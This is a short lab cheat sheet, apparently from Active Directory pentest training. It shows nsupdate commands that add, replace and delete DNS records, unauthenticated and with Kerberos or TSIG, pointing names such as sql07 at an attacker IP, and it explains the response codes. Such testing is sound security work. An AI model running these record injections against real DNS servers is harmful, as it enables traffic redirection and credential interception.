Dynamic DNS updates let a client ask the DNS server to add, replace, or delete records. In AD environments this can be unauthenticated, TSIG-signed, or Kerberos-authenticated through GSS-TSIG. We use it to test whether the DNS server accepts attacker-controlled records.
Variables
export DOMAIN=ootw.local
export DC=10.10.10.200
export ATTACKER=10.10.10.100
Unauthenticated add test
nsupdate
server 10.10.10.200
zone ootw.local
update add testupdate.ootw.local 60 A 10.10.10.100
send
quit
Verify unauthenticated update
dig @$DC testupdate.$DOMAIN A +short
Unauthenticated delete
nsupdate
server 10.10.10.200
zone ootw.local
update delete testupdate.ootw.local A
send
quit
Kerberos-authenticated update
echo 'student' | kinit student@OOTW.LOCAL
klist
nsupdate -g
server 10.10.10.200
zone ootw.local
update add sql07.ootw.local 60 A 10.10.10.100
send
quit
Kerberos-authenticated delete
nsupdate -g
server 10.10.10.200
zone ootw.local
update delete sql07.ootw.local A
send
quit
TSIG-signed update
nsupdate -k ./dns.key
server 10.10.10.200
zone ootw.local
update add labhost.ootw.local 60 A 10.10.10.100
send
quit
Replace a record
nsupdate -g
server 10.10.10.200
zone ootw.local
update delete labhost.ootw.local A
update add labhost.ootw.local 60 A 10.10.10.100
send
quit
Add CNAME
nsupdate -g
server 10.10.10.200
zone ootw.local
update add intranet.ootw.local 60 CNAME fileshare.ootw.local
send
quit
Debug failed updates
nsupdate -d -g
dig @$DC ootw.local SOA
dig @$DC testupdate.ootw.local A +short
Interpretation
NOERROR with a resolving record means the update worked.
REFUSED usually means the server or zone does not accept that update path.
NOTAUTH usually means the selected server is not authoritative for the zone.
NXDOMAIN after send usually means the update failed or the resolver is querying the wrong server.